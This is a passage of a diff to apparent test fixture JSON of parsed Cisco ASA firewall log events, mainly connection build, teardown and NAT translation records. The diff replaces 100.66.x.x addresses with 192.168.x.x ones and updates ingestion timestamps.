"192.168.54.190", "172.31.98.44" ] }, 
@@ -13571,8 +13571,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721994300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", + "ingested": "2021-12-09T13:34:28.100164200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13588,7 +13588,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.54.190", + "mapped_source_ip": "192.168.54.190", "connection_id": "11826", "source_interface": "outside", "mapped_destination_port": 1292 @@ -13605,8 +13605,8 @@ }, "destination": { "port": 8297, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1293, @@ -13646,7 +13646,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13654,8 +13654,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721998600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297", + "ingested": "2021-12-09T13:34:28.100187400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -13688,8 +13688,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -13724,7 +13724,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -13733,8 +13733,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722002900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", + "ingested": "2021-12-09T13:34:28.100192Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13750,7 +13750,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11827", "source_interface": "outside", "mapped_destination_port": 1293 @@ -13767,8 +13767,8 @@ }, "destination": { "port": 8298, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1294, @@ -13808,7 +13808,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -13816,8 +13816,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722007300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298", + "ingested": "2021-12-09T13:34:28.100196400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298", "code": "305011", "kind": "event", "action": "firewall-rule", 
@@ -13850,8 +13850,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -13886,7 +13886,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -13895,8 +13895,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722011500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", + "ingested": "2021-12-09T13:34:28.100201Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -13912,7 +13912,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11828", "source_interface": "outside", "mapped_destination_port": 1294 @@ -13934,8 +13934,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -13970,7 +13970,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -13981,8 +13981,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.722016300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:100.66.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", + "ingested": "2021-12-09T13:34:28.100205200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14014,8 +14014,8 @@ }, "destination": { "port": 8299, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1295, @@ -14055,7 +14055,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14063,8 +14063,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722020600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299", + "ingested": "2021-12-09T13:34:28.100210400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14097,8 +14097,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14133,7 +14133,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -14142,8 +14142,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722024900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", + "ingested": "2021-12-09T13:34:28.100232500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14159,7 +14159,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11829", "source_interface": "outside", "mapped_destination_port": 1295 @@ -14176,8 +14176,8 @@ }, "destination": { "port": 8300, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1296, @@ -14217,7 +14217,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14225,8 +14225,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722029300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300", + "ingested": "2021-12-09T13:34:28.100238300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14259,8 +14259,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -14295,7 +14295,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14304,8 +14304,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722033900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", + "ingested": "2021-12-09T13:34:28.100243800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14321,7 +14321,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11830", "source_interface": "outside", "mapped_destination_port": 1296 @@ -14343,8 +14343,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14379,7 +14379,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14390,8 +14390,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.722038400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:100.66.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", + "ingested": "2021-12-09T13:34:28.100249400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -14428,8 +14428,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14464,7 +14464,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14475,8 +14475,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.722042700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:100.66.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", + "ingested": "2021-12-09T13:34:28.100255Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -14513,8 +14513,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14549,7 +14549,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14560,8 +14560,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.722047Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:100.66.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", + "ingested": "2021-12-09T13:34:28.100260600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -14593,8 +14593,8 @@ }, "destination": { "port": 8301, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1297, @@ -14634,7 +14634,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14642,8 +14642,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722051200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301", + "ingested": "2021-12-09T13:34:28.100266200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14676,8 +14676,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14712,7 +14712,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -14721,8 +14721,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722055500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", + "ingested": "2021-12-09T13:34:28.100271800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -14738,7 +14738,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11831", "source_interface": "outside", "mapped_destination_port": 1297 @@ -14755,8 +14755,8 @@ }, "destination": { "port": 8302, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1298, @@ -14796,7 +14796,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -14804,8 +14804,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722060Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302", + "ingested": "2021-12-09T13:34:28.100277300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -14838,8 +14838,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -14874,7 +14874,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -14883,8 +14883,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722064400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", + "ingested": "2021-12-09T13:34:28.100282800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -14900,7 +14900,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11832", "source_interface": "outside", "mapped_destination_port": 1298 @@ -14922,8 +14922,8 @@ }, "source": { "port": 53, - "address": "100.66.179.9", - "ip": "100.66.179.9" + "address": "192.168.179.9", + "ip": "192.168.179.9" }, "tags": [ "preserve_original_event" @@ -14958,7 +14958,7 @@ "localhost" ], "ip": [ - "100.66.179.9", + "192.168.179.9", "172.31.98.44" ] }, @@ -14967,8 +14967,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722068900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:100.66.179.9/53 (100.66.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.100288400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", 
@@ -14984,7 +14984,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.179.9", + "mapped_source_ip": "192.168.179.9", "connection_id": "11833", "source_interface": "outside", "mapped_destination_port": 56132 @@ -15006,8 +15006,8 @@ }, "source": { "port": 53, - "address": "100.66.179.9", - "ip": "100.66.179.9" + "address": "192.168.179.9", + "ip": "192.168.179.9" }, "tags": [ "preserve_original_event" @@ -15042,7 +15042,7 @@ "localhost" ], "ip": [ - "100.66.179.9", + "192.168.179.9", "172.31.98.44" ] }, @@ -15052,8 +15052,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.722073200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:100.66.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", + "ingested": "2021-12-09T13:34:28.100294Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15090,8 +15090,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15126,7 +15126,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, 
@@ -15137,8 +15137,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.722077500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:100.66.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", + "ingested": "2021-12-09T13:34:28.100298900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15170,8 +15170,8 @@ }, "destination": { "port": 8303, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1299, @@ -15211,7 +15211,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15219,8 +15219,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722081700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303", + "ingested": "2021-12-09T13:34:28.100302400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15253,8 +15253,8 @@ }, "source": { "port": 80, - "address": "100.66.247.99", - "ip": "100.66.247.99" + "address": "192.168.247.99", + "ip": "192.168.247.99" }, "tags": [ "preserve_original_event" @@ -15289,7 +15289,7 @@ "localhost" ], "ip": [ - "100.66.247.99", + "192.168.247.99", "172.31.98.44" ] }, 
@@ -15298,8 +15298,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722086100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:100.66.247.99/80 (100.66.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", + "ingested": "2021-12-09T13:34:28.100306900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15315,7 +15315,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.247.99", + "mapped_source_ip": "192.168.247.99", "connection_id": "11834", "source_interface": "outside", "mapped_destination_port": 1299 @@ -15332,8 +15332,8 @@ }, "destination": { "port": 8304, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1300, @@ -15373,7 +15373,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15381,8 +15381,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722090500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304", + "ingested": "2021-12-09T13:34:28.100312100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15415,8 +15415,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -15451,7 +15451,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15460,8 +15460,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722095300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", + "ingested": "2021-12-09T13:34:28.100317Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15477,7 +15477,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11835", "source_interface": "outside", "mapped_destination_port": 1300 @@ -15499,8 +15499,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15535,7 +15535,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15546,8 +15546,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.722099500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:100.66.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", + "ingested": "2021-12-09T13:34:28.100322700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -15584,8 +15584,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15620,7 +15620,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15631,8 +15631,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.722103700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:100.66.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", + "ingested": "2021-12-09T13:34:28.100326900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15664,8 +15664,8 @@ }, "destination": { "port": 8305, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1301, @@ -15705,7 +15705,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15713,8 +15713,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722107900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305", + "ingested": "2021-12-09T13:34:28.100331100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15747,8 +15747,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -15783,7 +15783,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15792,8 +15792,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.722112300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", + "ingested": "2021-12-09T13:34:28.100334600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15809,7 +15809,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11836", "source_interface": "outside", "mapped_destination_port": 1301 @@ -15826,8 +15826,8 @@ }, "destination": { "port": 8306, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1302, @@ -15867,7 +15867,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15875,8 +15875,8 @@ }, "event": { "severity": 6, - "ingested": 